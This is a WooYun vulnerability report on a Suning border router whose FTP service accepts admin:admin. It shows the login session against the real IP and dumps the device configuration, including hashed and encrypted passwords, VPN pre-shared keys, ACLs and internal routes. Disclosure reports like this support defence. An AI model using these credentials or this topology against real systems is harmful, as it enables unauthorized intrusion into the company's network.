乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-01-07: 细节已通知厂商并且等待厂商处理中 2015-01-07: 厂商已经确认,细节仅向厂商公开 2015-01-17: 细节向核心白帽子及相关领域专家公开 2015-01-27: 细节向普通白帽子公开 2015-02-06: 细节向实习白帽子公开 2015-02-21: 细节向公众公开
苏宁某边界网络设备存在弱口令(带SSLVPN配置文件),深一步利用可能可以绕过边界防火墙
网络设备ftp服务弱口令: admin:admin
172-13-1-117:~ root$ ftp 58.213.19.168Connected to 58.213.19.168.220 FTP service ready.Name (58.213.19.168:root): admin331 Password required for admin.Password: 230 User logged in.Remote system type is H3C.ftp> ls227 Entering Passive Mode (58,213,19,168,19,23).125 ASCII mode data connection already open, transfer starting for /*.drwxrwxrwx 1 noone nogroup 0 Oct 19 2010 logfile-rwxrwxrwx 1 noone nogroup 16256 Oct 19 2010 p2p_default.mtd-rwxrwxrwx 1 noone nogroup 3751 Aug 18 2014 system.xml-rwxrwxrwx 1 noone nogroup 6187 Aug 18 2014 startup.cfg-rwxrwxrwx 1 noone nogroup 27450368 Jul 08 2014 msr30-cmw520-r2513p01-si.bin-rwxrwxrwx 1 noone nogroup 24621440 Jul 08 2014 msr30-cmw520-r2207-si.bin-rwxrwxrwx 1 noone nogroup 17449340 Jul 08 2014 msr30-cmw520-r2207p38-bi.bin-rwxrwxrwx 1 noone nogroup 20147 Aug 18 2014 config.cwmp-rwxrwxrwx 1 noone nogroup 5324 Jul 25 2014 _startup_bak.cfg-rwxrwxrwx 1 noone nogroup 476922 Aug 01 2014 vpn3040.diag-rwxrwxrwx 1 noone nogroup 188545 Aug 17 2014 default.diag-rwxrwxrwx 1 noone nogroup 18324480 Aug 18 2014 msr30-cmw520-r2311-bi.bin226 Transfer complete.
基础设施的鉴权信息,确认是suning的设备
local-user suning password cipher $c$3$AfZxBqelXWlJXRiJ83Av2ivB+WWEmBPDTEACLinFGc3+ authorization-attribute level 3 service-type ssh
对外开放了telnet和http管理端口,你懂得
suning: 内部网络架构透明
# dar p2p signature-file cfa0:/p2p_default.mtd# port-security enable# password-recovery enable#acl number 2000 rule 0 permit source 10.22.9.5 0 rule 5 permit source 10.22.9.215 0 rule 10 permit source 10.21.160.99 0#acl number 3000 rule 0 permit ip source 58.213.19.168 0 destination 221.226.125.148 0 rule 5 permit ip source 1.1.1.1 0 rule 10 permit ip source 221.226.125.148 0 rule 15 permit ip source 2.2.2.2 0acl number 3002 match-order auto description 2xuzhuangÏÞËÙ rule 0 permit ip destination 192.168.40.149 0acl number 3303 match-order auto description vpn2xuzhuang rule 10 deny ip source 10.21.160.99 0 rule 0 deny ip destination 10.21.160.99 0 rule 5 permit ipacl number 3304 match-order auto rule 5 permit ip source 192.168.0.0 0.0.255.255 rule 10 permit ip source 10.19.0.0 0.0.255.255 rule 15 permit ip source 10.24.0.0 0.0.255.255 rule 20 permit ip source 10.22.0.0 0.0.255.255 rule 0 deny ip destination 192.168.13.49 0#vlan 1#domain system access-limit disable state active idle-cut disable self-service-url disable#ike proposal 1 encryption-algorithm 3des-cbc#ike peer access exchange-mode aggressive proposal 1 pre-shared-key cipher $c$3$t6cH9TYK0j2lvziyz+VkcwnYSezftt1ugw== id-type name remote-name access nat traversal#ike peer xinjiekou exchange-mode aggressive proposal 1 pre-shared-key cipher $c$3$fOTu6fpwl5bY1oMj/cT2stF3Ue5ED707rVdZUw== id-type name remote-name xinjiekou nat traversal#ike peer yinhe exchange-mode aggressive proposal 1 pre-shared-key cipher $c$3$qjZO04rPk/ZAh0UJXOOG37rn958LzcHx3CZ/cuw= id-type name remote-name yinhe nat traversal#ipsec transform-set default encapsulation-mode tunnel transform esp esp authentication-algorithm md5 esp encryption-algorithm 3des#ipsec policy-template xinjiekou 1 ike-peer xinjiekou transform-set default#ipsec policy-template xuzhuang 1 ike-peer access transform-set default#ipsec policy-template yinhe 1 ike-peer yinhe transform-set default#ipsec policy ipsecdx 1 isakmp template xuzhuang#ipsec policy ipsecdx 2 isakmp template yinhe#ipsec policy ipsecdx 3 isakmp template xinjiekou#policy-based-route vpn2xuzhuang permit node 10 if-match acl 3303 apply ip-address next-hop 192.168.13.50#policy-based-route vpnup permit node 20 if-match acl 3304 apply ip-address next-hop 192.168.13.205 apply ip-address next-hop 192.168.13.209#user-group system group-attribute allow-guest#local-user admin password cipher $c$3$kczijeyDQHGhKbH67mwOnmOlFMY1ZeHd authorization-attribute level 3 service-type telnet service-type ftplocal-user suning password cipher $c$3$AfZxBqelXWlJXRiJ83Av2ivB+WWEmBPDTEACLinFGc3+ authorization-attribute level 3 service-type ssh#interface Aux0 async mode flow link-protocol ppp#interface Cellular0/0 async mode protocol link-protocol ppp#interface Serial4/0 link-protocol ppp#interface NULL0#interface LoopBack0#interface LoopBack1000#interface GigabitEthernet0/0 port link-mode route#interface GigabitEthernet0/0.104 description To_JS5060-1»¥Áª.025 vlan-type dot1q vid 104#interface GigabitEthernet0/0.1101 description To_C7609-1»¥Áª vlan-type dot1q vid 1101 ip policy-based-route vpn2xuzhuang#interface GigabitEthernet0/0.1102 description To_C7609-2»¥Áª vlan-type dot1q vid 1102 ip policy-based-route vpn2xuzhuang#interface GigabitEthernet0/1 port link-mode route description To_»¥ÁªÍø#interface GigabitEthernet0/1.2 description To_CTC01 vlan-type dot1q vid 2 ipsec policy ipsecdx qos gts acl 3002 cir 50000 cbs 3125000 ebs 0 queue-length 50#interface Tunnel0 description To_Ðìׯ×ܲ¿ mtu 1524 source LoopBack0 destination 2.2.2.2 ip policy-based-route vpnup#nqa entry 1 1 type icmp-echo data-size 20 destination ip 192.168.13.50 frequency 1000 probe count 2 probe timeout 50 reaction 1 checked-element probe-fail threshold-type consecutive 2 action-type trigger-only source ip 192.168.13.49 ttl 1# ip route-static 0.0.0.0 0.0.0.0 58.213.19.129 preference 5 ip route-static 10.19.250.6 255.255.255.255 192.168.13.50 ip route-static 10.21.160.99 255.255.255.255 192.168.13.205 ip route-static 10.21.160.99 255.255.255.255 192.168.13.209 preference 120 ip route-static 10.21.160.245 255.255.255.255 192.168.13.205 ip route-static 10.22.9.5 255.255.255.255 192.168.13.205 ip route-static 10.22.9.5 255.255.255.255 192.168.13.209 preference 120 ip route-static 10.22.9.215 255.255.255.255 192.168.13.50 ip route-static 172.33.0.1 255.255.255.255 172.16.0.1 ip route-static 172.33.0.2 255.255.255.255 172.16.0.2 ip route-static 192.168.0.0 255.255.0.0 192.168.13.209 preference 120 ip route-static 192.168.0.0 255.255.0.0 192.168.13.205#
system.xml
<!-- XML CONFIGURATION FILE --><sslvpn><diyview><title-diy-table><row><index-title>SSL VPN</index-title><welcome-title>Welcome to SSL VPN</welcome-title><service-title>SSL VPN</service-title></row></title-diy-table><pic-save-table><row><service-logo>/svpn/images/h3c.gif</service-logo><service-bg>/svpn/images/top_right_01.jpg</service-bg><index-logo>/svpn/images/h3c.gif</index-logo></row></pic-save-table><all-diy-table><row><enable>0</enable></row></all-diy-table></diyview><resview><res-ipac-global-table><row><keepalive>10</keepalive><clireach>0</clireach><onlyvpn>0</onlyvpn><sevdis>0</sevdis></row></res-ipac-global-table><res-group-table><row><id>33890</id><name>autohome</name></row><row><id>17507</id><name>autostart</name></row></res-group-table></resview><userview><user-group-table><row><id>17408</id><name>Guests</name></row></user-group-table><user-table><row><id>2162688</id><name>guest</name><description>Default guest user</description><password-md5>3C943016CF71D795F741F76EED5B63AF</password-md5><public>0</public><public-limit>0</public-limit><status>0</status><period>0-0-0</period><studymac>0</studymac></row></user-table></userview><domainview><domain-policy-table><row><enable-sec-policy>0</enable-sec-policy><enable-verify>0</enable-verify><enable-only-client>0</enable-only-client><enable-bind-mac>0</enable-bind-mac><enable-auto-login>0</enable-auto-login><user-out-time>30</user-out-time><dft-auth-method>1</dft-auth-method><cert-sect>0</cert-sect><verify-out-time>120</verify-out-time></row></domain-policy-table><cache-policy-table><row><clear-cache>1</clear-cache><clear-cookie>1</clear-cookie><clear-client>0</clear-client><clear-config>1</clear-config></row></cache-policy-table><dom-loc-auth-table><row><cerpol>0</cerpol></row></dom-loc-auth-table><dom-radius-auth-table><row><ifstartauth>0</ifstartauth><cerpol>0</cerpol><ifstartcharge>0</ifstartcharge><ifupvirtualaddr>0</ifupvirtualaddr></row></dom-radius-auth-table><dom-ldap-auth-table><row><servport>389</servport><version>3</version><cerpol>0</cerpol><ifstartauth>0</ifstartauth><checkmethod>TEMPLATE</checkmethod></row></dom-ldap-auth-table><dom-ad-auth-table><row><cerpol>0</cerpol><ifstartauth>0</ifstartauth><serverectime>5</serverectime><usrnamestyle>0</usrnamestyle></row></dom-ad-auth-table><dom-comb-auth-table><row><ifstartcombauth>0</ifstartcombauth><cerpol>0</cerpol><ifinputpaswrdagain>0</ifinputpaswrdagain><cerpol_a>0</cerpol_a></row></dom-comb-auth-table></domainview><servermng><server-mng-table><row><enable>0</enable><port>443</port></row></server-mng-table></servermng></sslvpn><nat><nat><respond-table><row><respond-get>0</respond-get></row></respond-table></nat></nat><waninter><macaddress><macclone-table><row><ifindex>1048576</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row><row><ifindex>1048577</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eee</devmac><configure>1</configure></row><row><ifindex>1049396</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eee</devmac><configure>1</configure></row><row><ifindex>1049394</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row><row><ifindex>1049395</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row><row><ifindex>1049393</ifindex><mactype>1</mactype><devmac>3ce5-a680-4eed</devmac><configure>1</configure></row></macclone-table></macaddress></waninter><seclanserver><rdserver><rds-auth-table><row><auth-enable>0</auth-enable></row></rds-auth-table></rdserver></seclanserver>
关闭外网接口
危害等级:高
漏洞Rank:20
确认时间:2015-01-07 20:03
感谢提交,低级错误,把猪猪侠大材小用了。
暂无
